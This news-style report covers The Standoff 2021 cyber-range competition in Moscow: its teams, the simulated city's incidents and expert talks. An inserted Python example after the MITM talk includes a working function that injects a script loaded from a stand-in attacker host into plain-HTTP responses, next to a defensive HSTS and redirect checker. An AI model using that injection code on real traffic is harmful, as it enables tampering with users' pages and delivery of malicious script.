Just like in real life: a train passenger alert system gets hacked seven times at the Moscow cyber-range

That's how The Standoff, the largest competition between hackers and IT security specialists, began

Would you take a self-driving car for a cruise downtown? Lots of people confidently answer "yes." But a self-driving car is basically a computer—and the traffic light hanging peacefully over the road is a computer too. If the traffic light alone gets hacked, never mind the car, it could cause an accident. Modern life in a city is kind of like a self-driving car: it is almost completely digitized. And that makes all of us vulnerable.

To understand which kinds of digital incidents can occur in a country, the largest open cyberbattle (it's in the Russian Book of Records) was created a few years ago. It’s called the Standoff, and it’s being held right now (November 14–16) in Moscow. Other activities are also in full swing: The Young Hats track for young scientists, The Standoff Digital Art hacking contest, and round tables with leading experts on information security from the largest companies.

The Standoff is a cyber-range that models the production and business processes of real companies and industries. This helps businesses to spot flaws in their infrastructure, and to understand exactly how hackers can get inside. At the cyber-range, infosec employees can hone their skills and expertise in thwarting cyberattacks that could have unacceptable consequences for the company. Not long ago, teams of attackers and defenders fought for control of a single city. By the fall of 2021, it had turned into a city-state with such industries as metallurgy, transport, logistics, oil and gas, energy, and municipal services. All its technology is controlled by the same real systems and controllers that run real infrastructure facilities. The event is attended by 10 attacker teams and five defender teams.

Who's attacking the city, and who's defending it

"Ten is the ideal number of attacking teams," said Yaroslav Babin, an event organizer on the red teams' side and the Head of Positive Technologies' Department of Web Application Security Analysis. If there are more than ten teams on the floor at once, they start getting in each other's way. Participants in the Standoff include the top ten attacker teams from the May cyberbattle:

  • True0xA3 came in first in 2019 and second in 2020. They were back on the winners' podium last spring. They intend to win three Standoffs in a row.
  • Codeby&NitroTeam is an international team featuring experts from codeby.net and Nitro Team, the Kazakhstan red team.
  • Invuls is a team of professionals in various IT security fields. The team members took part in Black Hat, ZeroNights, The Standoff and other CTF competitions. Two-time IoT CTF competition winners at DEFCON USA.
  • Team SPbCTF was formed at meetups of SPbCTF competitive hacking community spbctf.com and took part in The Standoff for the first time in 2019. They're probably the only team that includes secondary school students.
  • Bulba Hackers are students from Belarus. Their primary goal is to develop an information security community in Belarus: bulbahackers.by. Having started out by winning a national-level CTF event, the team is keen to expand the information security community in Belarus.
  • EvilBunnyWrote gained access to confidential information about passengers at City F’s virtual airport in spring 2020.
  • TSARKA is a top team of hackers from Kazakhstan. Three-time finalists of The Standoff, took first place in 2017.
  • Antibuddies is a group of IT security enthusiasts from all over the world. Part of the team won The Standoff 2019 and The Standoff Abu Dhabi. The lineup also features experts from Bi.Zone, Huawei, Informzaschita, and Network Optix.
  • SCS are veterans of The Standoff 2018 and 2019.
  • Unlim is a young and ambitious team from Tyumen. Discovered critical vulnerabilities during pentesting of regional organizations: banks, media, and a government data center. Took bronze in the CTF Russian Cup and silver in the Innopolis CTF Challenge.

"Attackers come to The Standoff for new experience," notes Yaroslav Babin. "Here they can really boost their skills. Besides, winning The Standoff is a highly prestigious, CV-worthy achievement; experts are genuinely proud of it. Ethical hackers also have a financial motive—the winners receive money prizes."

The defenders’ primary objective is to identify incidents in the infrastructure and investigate them quickly. According to Dmitry Ushakov, the manager of the cyber-range’s architecture, the Standoff’s defenders include five teams:

  • Kosmos (defending City Housing and Utilities and the State IT Platform)
  • G.A.R.M. (defending Tube and the State IT Platform)
  • }{01m$ Investigation (defending OilChem, MetalliKO, and the State IT Platform)
  • GiSCyberTeam (defending Heavy Logistics, the electric power industry and the State IT Platform)
  • Your shell not pass (defending Heavy Logistics and the State IT Platform)

"At The Standoff, defenders can verify the feasibility of unacceptable events," says Mikhail Pomzov, Director of Information Security Knowledge Base and Expertise, Positive Technologies. "They can test their own approaches to cybersecurity and train their team in order to find out how quickly and effectively they can respond to attacks, helping them to upgrade their security skills in real life."

Both speakers also shared a few secrets about the upcoming online cyber-range (to which major resources are currently being dedicated) and told us which infrastructure facilities will be first in line (spoiler: the banking and energy industries).

"Going online will allow us to significantly expand the cyber-range's audience," said Yaroslav Babin. "Right now we can afford ten red teams, or 120 members. The online cyber-range will give us unlimited options in this regard. By spring, we're planning to increase this number to 200–300. Ideally, we could have as many as 500 participants. This, of course, will require infrastructure transformation, which we're planning to do, but the figure seems quite realistic to me. Testing of the online cyber-range is scheduled for the end of November, when 50 ethical hackers who have already participated in The Standoff will be invited."

Battles in City F

All events in the city-state infrastructure are traditionally monitored by The Standoff's global SOC, which was deployed this year by the partner of the cyberbattle―Innostage Group. In terms of the infrastructure, the SOC is based on the key products of Positive Technologies and Innostage's in-house developments. Its main task is the general monitoring of the activity of both the attacker and defender teams.

"By midday on September 14th, a few teams of "reds" (hackers) had managed to disable the train passenger alert system," said Vladimir Dmitriev, Head of the Cybersecurity Service Department at CyberART (Innostage). "They attacked the systems that display information on screens at a City F train station, causing it to display misinformation instead." Transport company Heavy Logistics was hit by several red teams at once (True0xA3, Codeby&NitroTeam, Invuls, SPbCTF, Bulba Hackers, Antibuddies, SCS, and Unlim), and the train passenger alert system was disabled seven times. On November 15, it took the Your shell not pass blue team about 10 hours to investigate the incident.

The primary sources of incident data were the NTA (network traffic analysis) and WAF (web application firewall) solutions. The most frequent events were initial access (58%) and lateral movement (14%).

Alexei Goncharov, Assistant Director of Positive Technologies' Expert Security Center for Monitoring and Response Services, noted the high degree of engagement among the reds, but he also observed that many of their attacks were still ineffective. Both speakers also advised the defenders to "watch oil" and keep an eye on the government IT systems of the cyber-range.

During the first few hours, it became evident that the defenders were using various strategies: some of them focused on efficient interactions within the team, others were studying the behavior of security tools and their optimal configuration, and still other teams were battling for the fastest investigation.

G.A.R.M. submitted more attack reports than any other team. The attacks reported by the defenders by the end of the first day of the cyberbattle were no longer related to penetration—they mainly had to do with data collection, persistence, and lateral movement. Moreover, the defenders are reporting suspicious activity at Tube, an oil and gas company which, according to the city-state's legend, is engaged in the extraction, transportation, and storage of Earth's riches. Their reports suggest that the attackers have gained local administrator privileges on one of the hosts. The red teams have also managed to obtain access to the resources of the OilChem refinery. The next unacceptable event may occur at one of these companies.

Towards the evening of November 15th, the jury received 13 more vulnerability reports—69% of these vulnerabilities involved remote code execution. That was much less than the previous day. Apparently, the attackers are now focused on key infrastructure facilities, stopping at nothing to disrupt F's critically important companies.

Dmitry Gadar, Tinkoff Bank: "I know that I know nothing"

In a series of The Standoff live broadcasts, Dmitry Sklyarov, Head of Apps Analysis at Positive Technologies, sat down with top information security specialists from three large companies to chat about how they started working in cybersecurity, what they think can be done to improve information security, and what skills security professionals need to master.

Karim Valiev, Head of the Information Security Department, Mail.ru Group: "We need to allow users to choose between competing companies. Appropriate regulation, healthy initiatives, and the promotion of intelligent standards by the state can motivate companies to compete for users’ trust.”

Dmitry Gadar, Vice-President, Head of Information Security Department, Tinkoff Bank: "A security professional must develop critical thinking and constantly learn new things. You have to repeat to yourself "I know that I know nothing" and dig deeper, constantly improving your research skills."

Denis Gorchakov, Head of Information Security Department at Rostelecom: "Expertise gathered by the major players of the information security market must be combined in a shared knowledge base so that smaller players can also use it."

Alexey Zakharov, the founder of Superjob, also touched upon the topic of work in cybersecurity. He compared the increase in programmers’ salaries to the share prices of a leading maker of electric vehicles and predicted that the developer shortage will intensify. "We have a high-quality system for training coders, but there aren't enough young people to feed it. There are fewer and fewer qualified specialists… Salaries [next year in cybersecurity] will increase by at least 30%. Employers need to get ready. For the past two years, the cybersecurity salary index on Superjob seems to have been tracking Tesla's share price: salary offers for qualified cybersecurity professionals have grown at about the same rate."

About an axe, a bucket and a 90-percent increase in attacks on the industrial sector

The issue of the shared knowledge base also applies to industrial cybersecurity. Vladimir Zapolyansky, Director for Marketing and Corporate Communications, Positive Technologies, discussed trends in the protection of critical information infrastructure with Anton Kokin, Head of IT Infrastructure Protection at TMK. Vladimir noted that, according to Positive Technologies, the number of cyberattacks on the industrial sector in 2020 increased by 90% compared to 2019.

"Over the past 4–5 years, the security of industrial companies has greatly increased, and many have begun to pay more attention to it. But we can never be 100% certain," says Anton Kokin. "There is always the possibility of different outcomes, as evidenced by the Colonial Pipeline incident. But that is a reason not to be scared, but to initiate changes. One of the problems of the industrial sector is that we have not created an analog of the Bank of Russia's FinCERT. This is a venue for pooling experience, incident data, indicators of compromise—it's very important. As for The Standoff facilities, the attacks on metallurgical production are of great concern, since in real life they can lead to serious downtime. Power-generating companies can also find themselves in hackers' cross-hairs. Cyberexercises are vital, so we host our own. Defenders are like soldiers—they need training. As in the case of a fire, people need to know where the axe and bucket are."

Young people are studying neural networks, OSINT, and MITM attacks

Future information security experts—students and junior cybersecurity professionals—spoke as part of The Young Hats track. This was a competition held by Positive Technologies and the Innostage Group, the co-organizer of the cyberbattle, for up-and-coming infosec professionals. The operating principles of security products, vulnerabilities of neural networks, MITM attacks in the modern threat landscape, and new forensic methods are just a few of the topics that talented young specialists are researching. The young experts that made it to the finals were invited to present their ideas and projects at The Standoff Moscow.

In his talk, "101 for a neural network specialist," Mikhail Sukhov discussed the security of neural networks, a technology that is now used in a wide range of fields—from the banking sector to contemporary art. He explained what information security specialists need to know about them and the dangers they present for a business infrastructure.

Kseniya Zmicherovskaya also focused on neural networks and machine learning. After reviewing the major sore points for SOC experts that attackers can exploit, she argued that a more comprehensive approach to detecting previously unknown and complex cyberthreats is needed: as information security incidents—including false positives—are mushrooming, SOC analysts can easily miss them. Machine learning and process mining make it possible to identify user behavior scenarios and attack chains, combining them into a single timeline to facilitate not only detection, but incident investigation too.

Ilya Shaposhnikov, captain of the Invuls CTF team, discussed the Pentest Collaboration Framework, a tool his team developed. "The five main issues that come up when you're conducting a penetration test are: working with the initial data, storing information about the network and previous projects, generating reports, and quickly sending information to the customer, such as about the detection of a critical vulnerability. Our cross-platform, open-source, and—most important—free PCF tool can resolve most of those issues," Ilya said.

Darya Sukhova, a student at the National Research Nuclear University MEPhI, discussed a well-known and widely used method of attacking an organization's infrastructure. Attackers still successfully use MITM (man-in-the-middle) attacks to advance inside a local network. Darya said that to this day, many websites still operate over plain HTTP and do not automatically redirect to their HTTPS version. This enables attacks against users that inject malicious JavaScript code into pages and substitute downloaded files. The problem is even more acute on local networks, because protecting against this type of attack requires highly qualified IT staff and a lot of time.
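The two halves of Darya's point, shown as an added example (this is not code from the talk, the event, or any of the teams mentioned): first, what an on-path attacker can do to a response that travels over plain HTTP, and second, the check a defender runs against a site's own behaviour (a redirect to HTTPS on the plaintext side and an HSTS header on the HTTPS side). All HTTP responses below are constructed inline, not captured from any real site; `attacker.example` and `www.example.com` are placeholder hosts.

```python
"""Plain-HTTP tampering and the redirect/HSTS check that prevents it.

Added example, not part of the original write-up. Sample responses are
constructed here; attacker.example and www.example.com are placeholders.
"""
from __future__ import annotations

import re

# Hypothetical payload an on-path attacker (ARP spoofing, rogue AP, ...) splices in.
INJECTED = b'<script src="http://attacker.example/hook.js"></script>'


def build_response(status_line: str, headers: dict[str, str], body: bytes = b"") -> bytes:
    """Assemble a raw HTTP/1.1 response with a correct Content-Length (sample data)."""
    hdrs = dict(headers)
    hdrs["Content-Length"] = str(len(body))
    head = status_line + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in hdrs.items())
    return head.encode("latin-1") + b"\r\n" + body


def inject_script(raw_response: bytes, payload: bytes = INJECTED) -> bytes:
    """What a MITM does to a plaintext HTML response: add a <script> before </body>
    and fix Content-Length so the victim's browser accepts the modified page.
    Non-HTML or bodiless responses are passed through unchanged."""
    head, sep, body = raw_response.partition(b"\r\n\r\n")
    if not sep:
        return raw_response
    new_body = re.sub(rb"</body>", payload + b"</body>", body, count=1, flags=re.I)
    if new_body == body:
        return raw_response
    head = re.sub(rb"(?im)^content-length:\s*\d+",
                  b"Content-Length: %d" % len(new_body), head)
    return head + sep + new_body


def parse_headers(raw_response: bytes) -> tuple[int, dict[str, str]]:
    """Return (status code, lower-cased header map) of a raw HTTP/1.1 response."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def https_redirect_findings(http_response: bytes, https_response: bytes) -> list[str]:
    """Defender-side check: given the server's answer to a plain-HTTP request and to
    the same request over HTTPS, list what leaves users open to on-path tampering.
    HSTS is only honoured by browsers on the HTTPS response, so it is checked there."""
    findings = []
    status, headers = parse_headers(http_response)
    location = headers.get("location", "")
    if not (300 <= status < 400 and location.lower().startswith("https://")):
        findings.append("HTTP request served content instead of redirecting to HTTPS")
    _, s_headers = parse_headers(https_response)
    hsts = s_headers.get("strict-transport-security", "")
    m = re.search(r"max-age=(\d+)", hsts)
    if not m:
        findings.append("no Strict-Transport-Security header on the HTTPS response")
    elif int(m.group(1)) < 31536000:  # one year, the common minimum
        findings.append(f"HSTS max-age too short ({m.group(1)} s; want >= 31536000)")
    return findings


# Constructed sample traffic: a site that serves HTTP as-is versus one that redirects.
PAGE = b"<html><body><h1>Welcome</h1></body></html>"
WEAK_HTTP = build_response("HTTP/1.1 200 OK", {"Content-Type": "text/html"}, PAGE)
WEAK_HTTPS = build_response("HTTP/1.1 200 OK", {"Content-Type": "text/html"}, PAGE)
GOOD_HTTP = build_response("HTTP/1.1 301 Moved Permanently",
                           {"Location": "https://www.example.com/"})
GOOD_HTTPS = build_response("HTTP/1.1 200 OK",
                            {"Content-Type": "text/html",
                             "Strict-Transport-Security": "max-age=31536000; includeSubDomains"},
                            PAGE)
SHORT_HSTS_HTTPS = build_response("HTTP/1.1 200 OK",
                                  {"Content-Type": "text/html",
                                   "Strict-Transport-Security": "max-age=300"}, PAGE)

if __name__ == "__main__":
    print(inject_script(WEAK_HTTP).decode("latin-1"))
    print("weak site:", https_redirect_findings(WEAK_HTTP, WEAK_HTTPS))
    print("good site:", https_redirect_findings(GOOD_HTTP, GOOD_HTTPS))
```

The injected `<script>` is only possible because the plaintext response carries no integrity protection; once the site answers HTTP with a redirect and pins HTTPS via HSTS, the browser never issues the tamperable request again after the first visit. Inside a LAN the attacker's position is easier to obtain (ARP spoofing, a rogue DHCP server), which is why the same weakness matters more there.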

The rising generation of cybersecurity pros who presented in the technical track touched on subjects including the use of OSINT to detect data leaks and identify sources of threats, training information security specialists from a young age, and how the configuration of a Kubernetes cluster can benefit attackers.

The public portion of The Standoff 2021 fall cyber-range will end on November 16. The winners and top defender teams will be announced in the evening. Stay tuned!